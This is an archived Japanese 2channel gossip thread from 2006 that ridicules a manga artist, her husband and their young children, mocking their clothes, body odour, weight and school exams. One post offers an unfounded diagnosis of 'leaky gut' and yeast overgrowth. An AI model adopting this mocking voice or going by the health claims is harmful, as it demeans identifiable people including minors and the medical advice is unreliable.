256 :花と名無しさん:2006/11/26(日) 16:11:32 ID:???0
>>199
自分にだけ気をつけてるんでしょ。
たまにそういう親いるじゃん。

257 :花と名無しさん:2006/11/26(日) 18:10:48 ID:???0
>253
あんみつ&パジャマ&蛇皮という1行内でのあり得ない単語の組み合わせのコンボに
コーヒー吹き出した

258 :花と名無しさん:2006/11/26(日) 18:40:07 ID:???0
ラリゴのマフラーも・・・
ラリゴが身につけるだけで一気にダサくなる。

またジムビーム大好き病始まったな。

259 :花と名無しさん:2006/11/26(日) 19:08:52 ID:???0
>>257
むしろ「あんみつ パジャマ 蛇皮」でググりたい

260 :花と名無しさん:2006/11/26(日) 20:17:44 ID:???O
あんみつ&パジャマ&蛇皮
最強のコラボですな!さすがミカリン……
ガクガク(((゚д゚)))ブルブル…

261 :花と名無しさん:2006/11/27(月) 14:46:04 ID:???0
そーいや昔ワニ皮だったかのソファに一目惚れしてたよね>ミカリン
それでターシャとかも好きだったり、子供服はファミリアがいいとか
なんかもうすごいよ、すごすぎるよ・・・

262 :花と名無しさん:2006/11/27(月) 15:35:27 ID:???0
>>261
パンクな部分とファンシーな部分を合わせ持つミカリンスゴス

263 :花と名無しさん:2006/11/27(月) 19:33:44 ID:???0
この両極端どうよ

264 :花と名無しさん:2006/11/27(月) 21:01:50 ID:7tPGmw8HO
みんな人の心配するより自分の心配しようね(´∀`)


265 :花と名無しさん:2006/11/27(月) 21:08:26 ID:???0
他人の不幸は蜜の味

266 :花と名無しさん:2006/11/27(月) 22:38:12 ID:???0
>>264
大丈夫だよ!どんなに血迷っても水玉フリルと蛇皮なんて着こなし出来ないから。

267 :花と名無しさん:2006/11/27(月) 22:48:35 ID:???0
パンク転んでピンクハウスってのはいたけど
コラボは見たこと無いよな・・・足元は普通のスニーカーだし・・・

268 :花と名無しさん:2006/11/28(火) 19:58:23 ID:???0
ヤンキー→ピンクハウス転身組もかっては多かったそうですWA

269 :花と名無しさん:2006/11/28(火) 20:38:57 ID:???0
シャクレ自身、シャクレを知らない人にヲチされてそうだw

270 :花と名無しさん:2006/11/29(水) 17:18:20 ID:???O
昔すごろくに書いてた、ラリゴの不思議なセータ−の話覚えてる人いないですか?
ヨージかゴルチエだと思うんですけど、袖の沢山ついた蜘蛛が着るようなセーター
度肝抜かれたんですけど、夫婦揃ってアレですね

271 :花と名無しさん:2006/11/30(木) 00:44:11 ID:???O
どちらかを極めると逆に転身するってやつじゃまいか?
M極めた人がSになったりみたいな

272 :花と名無しさん:2006/11/30(木) 09:36:03 ID:???0
初期スレの頃はヒコマロそっくりじゃんとかいって笑われてたのに
今やヒコマロ売れっ子だもんなー、完全水を空けられたわね、ラリゴ。

273 :花と名無しさん:2006/11/30(木) 16:20:47 ID:???0
>>270
あったねー。ヨージだったと思う。
Y'S とかヨージとかゴルチェとか・・・時代を感じるな・・・

274 :花と名無しさん:2006/11/30(木) 17:13:33 ID:???0
シャクレ繋がりの西村しのぶも同じようなこと書いてましたね。
でも高木夫婦のセンスの悪さは、西村と比べる以前の問題だw

275 :花と名無しさん:2006/12/05(火) 14:08:52 ID:???O
弟の離婚書いてたのって何巻だっけ?

276 :花と名無しさん:2006/12/05(火) 19:53:28 ID:???0
4巻だったとオモ

277 :花と名無しさん:2006/12/06(水) 00:01:38 ID:???O
d♪

278 :花と名無しさん:2006/12/06(水) 18:04:47 ID:???0
階下のババ入院したんだね。大丈夫なんだろうか?

279 :花と名無しさん:2006/12/06(水) 19:01:30 ID:???0
心労では?

280 :花と名無しさん:2006/12/06(水) 20:29:34 ID:???0
絵で見る限りかなりふくよかだったし、病気になってもおかしくないよね。
毎日のように階下で夕飯ごちになってた子供らは今何を食べさせられてるの
だろうか・・・。


281 :花と名無しさん:2006/12/06(水) 21:08:31 ID:???0
階下のババの方が気を使って生活してるんだね
かわいそう

282 :花と名無しさん:2006/12/08(金) 22:55:01 ID:???0
飛行機のシートは、以前シート倒しのヒトコトをバカにした報いだなw

つうか、自分も倒せばいいのに・・・

283 :花と名無しさん:2006/12/09(土) 10:15:08 ID:???0
ぐのつく人、中学受験の予定なんだね・・
100人のうち98人が地元の公立に行く所で受験。
ハワイとか行ってるうちにクラスから浮いちゃったのかね?
この頃ぐの友達の話出てこないし・・・
なんてちょっと思ってしまった


284 :花と名無しさん:2006/12/09(土) 14:04:58 ID:???0
前にぐは中学受験するって書き込みあったけど、あれはホントだったんだね・・・

285 :花と名無しさん:2006/12/09(土) 15:15:56 ID:???0
初期の頃のミカリンを思い出すと、こんなに教育ママに
なるような人だとは思わなかったなあ

286 :花と名無しさん:2006/12/09(土) 17:29:36 ID:???0
他の一般人とは違うのよ!!って勘違いしてそう。

287 :花と名無しさん:2006/12/09(土) 22:25:29 ID:???0
シャクリソ、東京でのファッションは忠実に描いて欲しかったわ・・・
あのピエロシャツとか。

288 :花と名無しさん:2006/12/11(月) 01:30:43 ID:???0
北海道の受験事情が全くわからないのですが、どういう私立が
あるんだろう??
雰囲気としてはミッション系の女子校を受けさせそう・・・だ
けど??

289 :花と名無しさん:2006/12/11(月) 09:41:45 ID:???0
札幌市内で女子か共学となると、

藤女子中学校 (女)
札幌大谷中学校 (女)
北星学園女子中学校 (女)
札幌聖心女子学院中学校 (女)
東海大学第四高等学校付属中等部 (共)

ぐらいかと。

東海大学第四高等学校付属中等部が一番近いですね。
近さで選ぶことはないと思うけど。

290 :花と名無しさん:2006/12/11(月) 16:07:13 ID:???0
制服がオシャレだからとかくだらない理由で決めそうな気もするなぁ
それと校舎が綺麗だとかカフェテリアのメニューが好みだからとかさ
根がミーハーだし>ミカリン親子

291 :花と名無しさん:2006/12/11(月) 21:03:13 ID:???0
>>289
おいおい付属を忘れてるよw
あと慶祥もね。

どっちも もの凄く遠いけど・・。

292 :花と名無しさん:2006/12/11(月) 21:40:49 ID:???0
>>291
慶祥は江別市だよ。

付属は道教育大学?ここは国立だよね?
グがどんだけ秀才か知らんけど、ほぼ100パー無理かとw

293 :花と名無しさん:2006/12/11(月) 23:12:33 ID:D6FNLMqc0
ぐっちとにこちゃん みかりんの子育てBOXの中身て
どこに連載されてたもの?学研て。
書き下ろしじゃないよね?まさか夫すごろくの再録じゃあないよね?
ぐっちすごろくと同じ?
まー、話の内容は同じだろうけど。まったく一緒じゃないなら買いたい。
だれか買った人教えてください。

294 :花と名無しさん:2006/12/11(月) 23:20:29 ID:???0
>>293
密林のレビュー見てみてたら?
このスレではブコフ以外で買う人はいないと思うよ。

295 :花と名無しさん:2006/12/11(月) 23:28:15 ID:???0
>>293
立ち読みしたお
写真がいっぱい載っていた。
ジジババの年賀状までw

296 :花と名無しさん:2006/12/11(月) 23:31:55 ID:D6FNLMqc0
見たけどわからんから聞いてる。
・レディース向けコミック誌で好評だった連載に新たな書き下ろしを加えた一冊
・某学習雑誌の連載&書き下ろし
これってぐっちすごろくのこと?ぐっちすごろくにニコのこと加えたのか?
ぐっちすごろくは持っているから、半分以上はそれ以外の内容なら買いたいと思って。
叩かれるのもわかる人だけど、ちまちましていて読むのに時間かかるから長風呂の友にぴったり。
この人、自分のブログに自分の本の宣伝全然載せないのな。なんでだろ。

297 :花と名無しさん:2006/12/12(火) 02:01:11 ID:???O
『すごろく』いつまで続くのかなぁ?


298 :花と名無しさん:2006/12/12(火) 08:26:47 ID:???0
>>296
しまじろうの教材に入ってる小冊子の連載だよ。
内容はすごろくとかぶってる。書き下ろしもアリ。

299 :花と名無しさん:2006/12/12(火) 09:32:03 ID:???0
やっばブックオフで丁度いい内容だな

300 :花と名無しさん:2006/12/12(火) 13:17:35 ID:???0
この人の旦那って、脱出ゲームの人?

301 :花と名無しさん:2006/12/12(火) 14:08:07 ID:???0
そうそう、結局儲からなくて無駄に経費だけかかったあのゲームですよw

302 :花と名無しさん:2006/12/12(火) 14:55:59 ID:???0
>>301
ありがとう
やっぱそうなのか
つーか、儲からなかったんだね…

303 :花と名無しさん:2006/12/12(火) 17:13:32 ID:???0
最初は儲ける気など無かったけど、思いのほか大人気だったため
妻に尻叩かれてw小市民らしい欲を出し課金システムを作った。
が、
善意の課金システムだったため、ミクでお強請りされた仲間内と馬鹿正直しか課金せず。
そのシステムもトラブル続きで課金したくても出来ない状態があったw
仕方なく虎の巻を販売したが、2ちゃんねるのスレでネタバレしていたので
こちらも買う人はほとんどいなかった。らしい。

304 :花と名無しさん:2006/12/12(火) 18:12:20 ID:???0
ラリゴ、アホスwwww

305 :花と名無しさん:2006/12/12(火) 19:07:30 ID:???0
臭っても社長なのに、業務計画とか一切ナシでゴリラ押ししてんだね

306 :花と名無しさん:2006/12/12(火) 21:31:37 ID:???0
>>303
そんな経緯があったんだ
まー私もお金払わなかったけどw
この人の脱出ゲームって何気に有名だけど、
他の有名ゲームから入ったからか、イマイチ好きになれないんだよね

307 :花と名無しさん:2006/12/12(火) 22:40:05 ID:???0
それは・・・ゲームから滲み出るラリゴの自己顕示欲のせいかとw

308 :花と名無しさん:2006/12/13(水) 21:01:54 ID:???O
>>305
うまいなwwwww

309 :花と名無しさん:2006/12/15(金) 16:47:08 ID:???0
すっっごい盛り下がったスレになったけど
何が原因なんだろ。ラリゴのきもさは変わらないのに・・

310 :花と名無しさん:2006/12/15(金) 17:35:37 ID:???O
底が見えたからじゃ?
ラリゴ卑怯者だし。
私はミカリンに同情するわよ。

311 :花と名無しさん:2006/12/15(金) 21:26:59 ID:???P
他人への愚痴悪口を描かなくなったらつまらなくなったよね。
グの中学受験を視野に入れたから?
しかし単行本は汚点にしっかり残っている。
私立なんてイメージ重視だから、いくら金があってもこんな漫画を
描く親を持つ子供を入学させるかな?
少子時代だから入れたとしても、学校のことは漫画に描くなとお達し
ありそうだけど・・・

312 :花と名無しさん:2006/12/16(土) 08:40:34 ID:???0
学校側がそこまでチェック(以前描いた漫画)するものなの?
昔はともかく今は無名に近い漫画家だしバレないでしょ
ライバルの親が校長に単行本を送りつけるとかすれば読むだろうけど

313 :花と名無しさん:2006/12/16(土) 10:01:33 ID:???0
職業を書きますから。
夫婦、子供で本名で出ているし隠したところでバレバレだ。
それに道内ではそこそこ稼いでいるほうなんだよシャクレは。
北の果ての私立と思ってバカにしちゃいけないよw

314 :花と名無しさん:2006/12/16(土) 14:03:09 ID:???0
本人達見てるようだから書くけど、
旦那さん体臭があって小麦で眠くなるってのは腸管壁浸漏症候群や
イーストコネクションだと思うから。
それが原因で鬱病にもなるし、鼻も悪くなる。
腸内の悪玉菌(カビ)が繁殖してる可能性大だから検査して
治療と食事療法した方がいい。
砂糖やアルコールは悪玉菌の餌になるのでそういう人は避けないと駄目。
娘さんもこれからあちこちに影響出ますよ。

315 :花と名無しさん:2006/12/17(日) 04:05:21 ID:???0
>>314
そういやラリゴって蓄膿症じゃなかったっけ?
当たってるんじゃ。

316 :花と名無しさん:2006/12/19(火) 02:44:31 ID:???0
>>315なんか前、頬に激痛がしてオレンジ色の鼻水が出るって書いてたよね。
どんだけ重症なんだ・・・治療しないのかな?

317 :花と名無しさん:2006/12/19(火) 08:12:35 ID:???O
今更だけど色の部屋やったですよ!
フツーにおもしろかった。
ブルーがフツーに難しいね。
携帯版だったので通勤時かなり時間つぶしになった。
まりがとうラリゴ〜

318 :花と名無しさん:2006/12/19(火) 22:19:09 ID:???0
なんか異臭が漂ってきたな。

319 :花と名無しさん:2006/12/19(火) 23:44:18 ID:???0
腐臭もするね

320 :花と名無しさん:2006/12/22(金) 08:46:41 ID:???0
ミカリンブログ、荒らしてるの誰?
やりすぎで引くよね・・・

321 :花と名無しさん:2006/12/22(金) 09:17:42 ID:???0
あれは荒らしなのか?
2回しか書き込んで無いし、実際の知り合いじゃないのか?
シャクレのあの性格にあの子供たちだから、恨まれてもおかしくないかとw

322 :花と名無しさん:2006/12/22(金) 21:01:55 ID:???0
あれって相当ブログ更新してほしい人が書いてんじゃないの?
更新して〜→まだ〜?→ブチ切れ
って流れなのかと思ってた
相当ミカリン事情が知りたいんだね
どんだけ楽しみにしてんだよwwww

323 :花と名無しさん:2006/12/22(金) 23:59:40 ID:???0
課金制にしたら毎日更新するであろう・・
フィヤンに描かなくなった愚痴や悪口を満載で書けばいいんだよw

324 :花と名無しさん:2006/12/23(土) 01:19:11 ID:fEAxhvIo0
でも付属の子に電話でなんか聞いてたよね?
付属はテストのあとは抽選。
受かるチャンスはあるぞーー

325 :花と名無しさん:2006/12/23(土) 02:04:25 ID:???0
親子面接でかなり悪印象w

326 :花と名無しさん:2006/12/23(土) 10:58:24 ID:???0
国立の中学だと抽選後の面接で落ちるなんてこと稀なのでは

いやその時ミカリンの服が水玉パジャマ蛇皮服の組み合わせ、
みたいな格好だったらわからないが。とここまで書いて
ミカリンだったら面接の時の服装についても絶対描きそうだな、と思った
普通の紺の膝丈スーツなんてダサすぎ!どうせなら普段のオサレにも
着られるものをヨージに探しに行ったウンヌン・・みたいな。

327 :花と名無しさん:2006/12/23(土) 12:17:36 ID:???0
札幌の国立の中学は教育大学付属中学だけだよね?
小学校からの内部が多いから、中学からの外部枠はかなり少ないらしいけど。
グの学力って正直どのくらいなんだろう?

328 :花と名無しさん:2006/12/23(土) 20:09:09 ID:???O
携帯から失礼。

シャクレの仕業で結膜炎→性病の図式ができてしまった私。
現在、結膜炎治療中でここを覗きに来たんだけど、
心配しなくてもいいのね。

勿論シャクレの様に「ビデを手で洗う」なんて事はしてないし、
パンツで体も洗わない。

綺麗好きみたいだけど、この人の衛生観念ってオカシイよね?

329 :花と名無しさん:2006/12/23(土) 22:24:53 ID:???0
オカシイのは衛生観念だけではありません

330 :328:2006/12/23(土) 23:01:42 ID:???O
>>329
そうだったねw


331 :花と名無しさん:2006/12/24(日) 12:59:58 ID:???0
ビデを手で洗うなんてあったっけ?そりゃひどいわ。

332 :花と名無しさん:2006/12/24(日) 22:35:35 ID:???O
あったよー。
結膜炎の回に。
(゚Д゚)ハァ?って思ったもん。


333 :花と名無しさん:2006/12/25(月) 16:04:51 ID:???O
手で洗うってイコール素手って事なのかな?それともしっかり掴んで細かに、と言う洗い方なのか?

この前松居一代が素手で(手袋せず)トイレ掃除してるのを見たけど、
うちも奥まで突込む訳じゃなかったら手袋無でササッとやるけど…。
(というかマメにしてたらしっかりやり込まなくても綺麗に保てそうな)
ビデもクリーナーで拭いたりしたけど素手で充分綺麗になったけど…。
使わないから分らないんだけど、ミカリンは使うんだよね?菌が付く(かも)って位だとどんな風に掃除したんだろう。
私が不潔なのか?(゜Д゜;)

334 :花と名無しさん:2006/12/25(月) 17:28:58 ID:???0
>>333
トイレ掃除の事では無くて、用を足した時の事だと思ってたけど。
おしっこ→アソコを手を使って洗う→手にはウィルス一杯
じゃないの?


335 :花と名無しさん:2006/12/25(月) 19:21:39 ID:???O
>>334
ビデを手で洗うって書いてなかったっけ?
直にガシッ!と掴んで洗ってっりするのかナーとか考えてみたりしてた。
今本が手元にないんで見られないんだけど。
アソコを洗うって…考えつきもしなかったわ。もしそうなら、理解出来ない、私には……。


336 :花と名無しさん:2006/12/26(火) 00:39:43 ID:???0
ビデのエピソードってどの本に載ってるんですか?

337 :花と名無しさん:2006/12/26(火) 11:16:27 ID:???0
前にシャクレがマンセーしてた「ターシャ」さんの番組が
昨夜TV放映されてたんで、久しぶりにカキコ。

1年に使う蝋燭1000本を家族総出で手作りしたり、
広大な庭のガーデニング・・・
それも死ぬ前に少しずつ庭を自然に帰しているとか。
19世紀の生活を実践されてるって、
美しいけど他の人は無理って暮らしぶり。
息子さんのコメント
「母は努力の人です。絵1枚描くにも台所を行き来しながら。」

子供2人を預けて、食事も旦那任せ、買い物も両親任せ
のシャクレとはえらい違いだなーと感じた。
ところで、はまってた石鹸作りとかはもうやってないの?


338 :花と名無しさん:2006/12/26(火) 11:29:27 ID:???0
もう飽きたんジャネ?
今は英語に夢中

339 :花と名無しさん:2006/12/27(水) 13:11:22 ID:???0
>ニコ友のママが送ってくれたもの。
>かわいい棒付きチョコが9本入り!
>「チョコといえば高木さん(私ね)」と思い出し
>買って送ってくれたそうな。
>チョコ好きを公言しておいて良かった。

こうしていつも公言してお強請りをしているのね。

340 :花と名無しさん:2006/12/27(水) 13:16:14 ID:???0
常にお貰いを想定して描いているのか・・・

341 :花と名無しさん:2006/12/27(水) 16:11:02 ID:???0
>チョコ好きを公言しておいて良かった。

・・・呆れてものも言えない

342 :花と名無しさん:2006/12/27(水) 17:26:44 ID:???0
誌面でお強請りをあまりしなくなったと思ったら
知り合いの間でめっちゃお強請りしてたんだね。

ところで、一時異常にお強請りしてたちりめん、
一切出てこなくなった。
自分には無理だって途中で投げ出したのだろうが・・・

343 :花と名無しさん:2006/12/27(水) 18:10:23 ID:???O
>>342
自分でやる気あったのか?
てっきり母親にやらせる気だと思ってた


344 :sage:2006/12/27(水) 18:57:00 ID:hK5Divv6O
ニコタン、下着のサイズ150って本当かな?体重30〜40キロはないとこのサイズは。。ニコタンまだD才位の話だし、これはヤバくない?!肥満児じゃん。

345 :花と名無しさん:2006/12/27(水) 19:08:16 ID:???P
だから肥満児だってば

346 :花と名無しさん:2006/12/27(水) 19:46:29 ID:???0
ぐっちゃんのメガネ姿がとっても腐女子風になっている!

347 :花と名無しさん:2006/12/27(水) 20:22:48 ID:???O
写真見るかぎりブクブクに太ってはないよね。でも年長で150センチは無いだろ… サイズ150って小学C〜D年だろ〜がよ。

348 :花と名無しさん:2006/12/27(水) 21:55:12 ID:???0
ビデの話だけど
たぶん掃除するとき素手で洗うって事だったと
思うよ。綺麗好きが仇になったの?とか書いてたから


349 :花と名無しさん:2006/12/28(木) 08:50:18 ID:???0
ニコって小2だったよね?150ってこの年じゃ学年1背が大きい子だとしても
あり得ないサイズだよ・・・
前に、日本のパンツのゴムが嫌でブリーフぐっちゃんに穿かせてたじゃない?
それと同じように、ブカブカの穿かせてるのでは。

350 :花と名無しさん:2006/12/28(木) 11:46:56 ID:???0
色素沈着が嫌で大きめのを探してたじゃんミカリン。
だから150はトランクス状態ではいてるんじゃまいか?

351 :花と名無しさん:2006/12/28(木) 12:33:23 ID:???0
いや・・・んw

352 :花と名無しさん:2006/12/28(木) 21:54:57 ID:???O
トランクス状態か〜 それならわかる。150センチのパンツの話は、まだ年長の時のエピソードとしてでてるんだよ… でも幼稚園児が150センチぴったりってありえないもんな〜

353 :花と名無しさん:2006/12/29(金) 18:25:45 ID:???0
今月のコーラスの一コマでは、またしても
コクヨのスクラップブックをアピール!!
あの一コマって、あのキャラが一言言う挿絵で
シャクレのお気に入り&お強請りをアピールする場じゃないのに・・・
コクヨさん、シャクレが般若のような笑顔で待ってますよ。

354 :花と名無しさん:2006/12/29(金) 22:41:04 ID:???0
コクヨの中の人、シャクレにモノを与えないように願いします
すぐ飽きて捨てますから

80 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)